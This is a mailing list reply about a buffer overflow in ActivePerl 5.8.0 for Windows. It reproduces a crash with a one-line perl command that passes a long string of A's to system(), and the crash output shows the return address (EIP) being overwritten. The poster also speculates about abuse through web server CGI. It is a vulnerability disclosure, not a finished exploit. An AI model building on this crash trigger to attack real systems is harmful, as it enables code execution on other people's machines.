<<< Date Index >>>     <<< Thread Index >>>

Re: Buffer Overflow in ActivePerl ?



"Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx> wrote:

> i played around with ActiveState's ActivePerl for Win32, and crashed 
> Perl.exe with the following command:
> 
> perl -e "$a="A" x 256; system($a)"

Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus 
all but last week's security patch:

   perl -e "$a="A" x 256; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x00657865.  The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

   C:\>perl -e "$a="A" x 259; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x65004141.  The memory could not be "written".

and we seem to get control of EIP.  Coincidence?  Try yet two more:

   C:\>perl -e "$a="A" x 261; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x41414141.  The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless 
perhaps a script processor on a web server can be cajoled into doing 
something with this??  (Not at all familiar with the innards of Windows 
web servers and their relationship to their CGI, etc processors...)


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854